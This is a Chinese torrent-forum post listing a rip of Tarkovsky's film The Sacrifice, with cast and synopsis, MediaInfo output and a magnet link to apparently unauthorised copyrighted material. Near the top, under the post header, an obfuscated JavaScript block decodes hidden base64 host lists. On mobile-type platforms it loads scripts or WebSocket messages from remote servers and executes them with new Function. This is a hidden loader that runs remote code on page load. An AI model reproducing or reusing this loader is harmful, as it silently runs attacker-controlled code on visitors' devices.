牺牲[中文字幕].The.Sacrifice.1986.1080p.BluRay.x265.10bit.DTS.2.0 10.37GB

版主小s 1月前 214

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 牺牲 / Le sacrifice / The Sacrifice
◎片  名 Offret
◎年  代 1986
◎产  地 瑞典 / 法国 / 英国
◎类  别 剧情
◎语  言 瑞典语 / 法语 / 英语
◎上映日期 1986-05-09(瑞典) / 1986-09-06(多伦多电影节)
◎IMDb链接 https://www.imdb.com/title/tt0091670/
◎豆瓣评分 8.8/10 (9016人评价)
◎豆瓣链接 https://movie.douban.com/subject/1294531/
◎片  长 149 分钟
◎导  演 安德烈·塔可夫斯基 Andrei Tarkovsky (id:1027778)
◎编  剧 安德烈·塔可夫斯基 Andrei Tarkovsky (id:1027778)
◎演  员 厄兰·约瑟夫森 Erland Josephson (id:1019223)
       苏珊·弗利特伍德 Susan Fleetwood (id:1050112)
       艾伦·埃德渥 Allan Edwall (id:1050222)
       古德·吉斯拉德提尔 Guerún Gísladóttir (id:1095166)
       斯文·沃尔特 Sven Wollter (id:1165228)
       瓦莱莉·迈蕾丝 Valérie Mairesse (id:1123546)
       菲利帕·弗伦岑 Filippa Franzén (id:1343992)
       汤米·谢尔奎斯特 Tommy Kjellqvist (id:1343993)
       Anna-Lena Wibom Anna-Lena Wibom (id:1300855)
       斯文·尼科维斯特 Sven Nykvist (id:1037076)
       安德烈·塔可夫斯基 Andrei Tarkovsky (id:1027778)
       克莱尔·德尼 Claire Denis (id:1045155)

◎标  签 塔柯夫斯基 / 瑞典 / 苏联 / 1986 / 文艺 / 剧情 / 苏联电影 / 法国

◎简  介
  评论家亚历山大(厄兰·约瑟夫森 Erland Josephson 饰)在瑞典的家中庆祝自己的五十岁生日,年幼的小儿子刚做完咽喉手术不能发声。两人在静默中种下一株树苗期待它生出绿色的枝叶,然而就在当天晚上,电台广播了一则发射核导弹的消息,第三次世界大战即将爆发。绝望的亚历山大向上帝祈祷不要发生战争,甚至他愿意奉献自己的一切来阻止世界末日的来临。期待世界重生的亚历山大在心力交瘁的情况下,烧毁了自己的房子。在熊熊大火中,亚历山大被救护车送进了医院。小儿子来到岸边继续为他们共同栽种的树苗浇水,一切似乎又恢复了平静。                                    
                                苏联著名电影大师安德烈·塔科夫斯基生前执导的最后一部杰作《牺牲》,荣获1986年戛纳电影节天主教人道精神奖在内的四项大奖,并提名金棕榈奖最佳影片,于1988年荣获第41届英国电影和电视艺术学院奖最佳外语片。

◎获奖情况 (共5项)
  第39届戛纳电影节 (1986)
  主竞赛单元 金棕榈奖(提名)
   └──安德烈·塔可夫斯基 (id:1027778)
  主竞赛单元 评审团大奖
   └──安德烈·塔可夫斯基 (id:1027778)
  费比西奖
   └──安德烈·塔可夫斯基 (id:1027778)
  最佳艺术贡献
   └──斯文·尼科维斯特 (id:1037076)
  天主教人道精神奖
   └──安德烈·塔可夫斯基 (id:1027778)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 282134158972471366867517560018942170060 (0xD4411000A7162782955F97501E6A13CC)
  4. Complete name                            : [email protected]COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 10.4 GiB
  8. Duration                                 : 2 h 26 min
  9. Overall bit rate                         : 10.1 Mb/s
  10. Movie name                               : The Sacrifice 1986
  11. Encoded date                             : UTC 2021-08-13 12:54:27
  12. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 2 h 26 min
  23. Bit rate                                 : 8 562 kb/s
  24. Width                                    : 1 792 pixels
  25. Height                                   : 1 080 pixels
  26. Display aspect ratio                     : 5:3
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.185
  33. Stream size                              : 8.77 GiB (85%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1792x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio
  39. ID                                       : 2
  40. ID in the original source medium         : 4352 (0x1100)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 2 h 26 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 2 channels
  48. Channel layout                           : L R
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 24 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.54 GiB (15%)
  54. Language                                 : Swedish
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Original source medium                   : Blu-ray
  58. Text #1
  59. ID                                       : 3
  60. ID in the original source medium         : 4609 (0x1201)
  61. Format                                   : PGS
  62. Muxing mode                              : zlib
  63. Codec ID                                 : S_HDMV/PGS
  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  65. Duration                                 : 2 h 25 min
  66. Bit rate                                 : 13.5 kb/s
  67. Count of elements                        : 2381
  68. Stream size                              : 14.1 MiB (0%)
  69. Title                                    : chs&eng
  70. Language                                 : Chinese
  71. Default                                  : No
  72. Forced                                   : No
  73. Original source medium                   : Blu-ray
  74. Text #2
  75. ID                                       : 4
  76. ID in the original source medium         : 4610 (0x1202)
  77. Format                                   : PGS
  78. Muxing mode                              : zlib
  79. Codec ID                                 : S_HDMV/PGS
  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  81. Duration                                 : 2 h 25 min
  82. Bit rate                                 : 14.4 kb/s
  83. Count of elements                        : 2440
  84. Stream size                              : 15.0 MiB (0%)
  85. Title                                    : cht&eng
  86. Language                                 : Chinese
  87. Default                                  : No
  88. Forced                                   : No
  89. Original source medium                   : Blu-ray
  90. Text #3
  91. ID                                       : 5
  92. ID in the original source medium         : 4611 (0x1203)
  93. Format                                   : PGS
  94. Muxing mode                              : zlib
  95. Codec ID                                 : S_HDMV/PGS
  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  97. Duration                                 : 2 h 25 min
  98. Bit rate                                 : 13.6 kb/s
  99. Count of elements                        : 2381
  100. Stream size                              : 14.2 MiB (0%)
  101. Title                                    : chs
  102. Language                                 : Chinese
  103. Default                                  : No
  104. Forced                                   : No
  105. Original source medium                   : Blu-ray
  106. Text #4
  107. ID                                       : 6
  108. ID in the original source medium         : 4612 (0x1204)
  109. Format                                   : PGS
  110. Muxing mode                              : zlib
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 2 h 25 min
  114. Bit rate                                 : 14.6 kb/s
  115. Count of elements                        : 2440
  116. Stream size                              : 15.2 MiB (0%)
  117. Title                                    : cht
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Original source medium                   : Blu-ray
  122. Text #5
  123. ID                                       : 7
  124. ID in the original source medium         : 4608 (0x1200)
  125. Format                                   : PGS
  126. Muxing mode                              : zlib
  127. Codec ID                                 : S_HDMV/PGS
  128. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  129. Duration                                 : 2 h 26 min
  130. Bit rate                                 : 41.3 kb/s
  131. Count of elements                        : 2366
  132. Stream size                              : 43.2 MiB (0%)
  133. Language                                 : English
  134. Default                                  : No
  135. Forced                                   : No
  136. Original source medium                   : Blu-ray
  137. Menu
  138. 00:00:00.000                             : Chapter 01
  139. 00:12:59.612                             : Chapter 02
  140. 00:21:24.283                             : Chapter 03
  141. 00:28:42.303                             : Chapter 04
  142. 00:42:49.275                             : Chapter 05
  143. 00:54:44.489                             : Chapter 06
  144. 01:02:16.065                             : Chapter 07
  145. 01:09:18.279                             : Chapter 08
  146. 01:20:12.098                             : Chapter 09
  147. 01:35:15.000                             : Chapter 10
  148. 01:49:18.093                             : Chapter 11
  149. 01:59:35.251                             : Chapter 12
  150. 02:07:36.190                             : Chapter 13
  151. 02:14:50.165                             : Chapter 14
  152. 02:21:00.743                             : Chapter 15


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:20A44AB1D154F70F7680A46252A767B1656FB111
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖